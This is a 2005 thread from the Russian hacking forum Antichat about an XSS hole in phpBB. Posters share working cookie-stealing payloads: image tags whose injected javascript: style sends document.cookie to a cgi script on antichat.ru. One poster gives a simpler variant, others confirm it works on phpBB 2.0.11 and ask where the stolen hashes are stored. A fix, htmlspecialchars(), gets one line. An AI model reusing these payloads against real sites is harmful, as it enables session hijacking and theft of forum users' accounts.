ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   XSS в phpBB (https://forum.antichat.xyz/showthread.php?t=4592)

zFlex 13.01.2005 23:42

Вот пример:
Код:

http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()
;)

Егорыч+++ 13.01.2005 23:53

да прикольно..

Егорыч+++ 13.01.2005 23:55

Плохо что максимум что можно с этого взять это базу пользователей

>>ElvI$<< 14.01.2005 00:44

Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843

Algol 14.01.2005 13:00

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:
Код:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
:D

TORn@Do 14.01.2005 13:33

Цитата:

Сообщение от Algol
Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:
Код:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
:D

урааааааааа Работает даже на версси PHPBB 2.0.11

TORn@Do 14.01.2005 13:37

plunul eto:
document.writeln (
"<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" +
"&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref =http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http% 3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" +
"<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>"
);

A1ien 15.01.2005 09:17

Цитата:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
И куда сохраняется файл с Хешами ???

alien51 15.01.2005 13:30

Вот вот где путь то на скрип и какой должен быть скрипт ... ??

b00 15.01.2005 17:30

Цитата:

Сообщение от TORn@Do
урааааааааа Работает даже на версси PHPBB 2.0.11

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru


Время: 16:43